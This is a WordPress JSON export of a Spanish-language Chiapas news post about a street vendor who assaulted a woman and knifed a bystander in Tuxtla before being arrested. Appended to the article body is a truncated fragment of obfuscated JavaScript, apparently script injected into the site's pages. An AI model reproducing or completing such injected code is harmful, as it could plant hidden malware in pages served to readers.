{"id":10214,"date":"2023-05-27T03:32:28","date_gmt":"2023-05-27T03:32:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10214"},"modified":"2023-05-27T03:32:28","modified_gmt":"2023-05-27T03:32:28","slug":"a-la-popular-fue-a-parar-por-golpear-a-una-senora-en-el-centro-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10214","title":{"rendered":"A la Popular fue a parar por golpear a una se\u00f1ora en el centro de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"676\" height=\"706\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685158266985.jpg\" alt=\"\" class=\"wp-image-10215\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685158266985.jpg 676w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685158266985-287x300.jpg 287w\" sizes=\"auto, (max-width: 676px) 100vw, 676px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 26 de mayo del 2023. Tuxtla Guti\u00e9rrez. &#8211; En las primeras horas de este viernes se registr\u00f3 una ri\u00f1a entre ambulantes en el primer cuadro de Tuxtla Guti\u00e9rrez, dejando como saldo dos heridos y un detenido.<\/p>\n\n\n\n<p>Testigos se\u00f1alaron que un sujeto, conocido como \u201cEl Majuel\u201d agredi\u00f3 a una mujer de 50 a\u00f1os, por lo que sus compa\u00f1eros llegaron en su defensa.<\/p>\n\n\n\n<p>En el lugar se inform\u00f3 que, el agresor de la mujer tambi\u00e9n atac\u00f3 a otro hombre con una navaja quien intent\u00f3 defenderla.<\/p>\n\n\n\n<p>Finalmente abusivo sujeto fue oportunamente detenido por elementos municipales y llevado a La Popular para que se le baje la bravuconer\u00eda.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 26 de mayo del 2023. Tuxtla Guti\u00e9rrez. &#8211; En las primeras horas de este viernes se registr\u00f3 una ri\u00f1a entre ambulantes en el primer cuadro de Tuxtla Guti\u00e9rrez, dejando como saldo dos heridos y un detenido. Testigos se\u00f1alaron que un sujeto, conocido como \u201cEl Majuel\u201d agredi\u00f3 a una mujer de 50 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10215,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10214","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10214","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10214"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10214\/revisions"}],"predecessor-version":[{"id":10216,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10214\/revisions\/10216"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10215"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10214"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10214"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10214"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}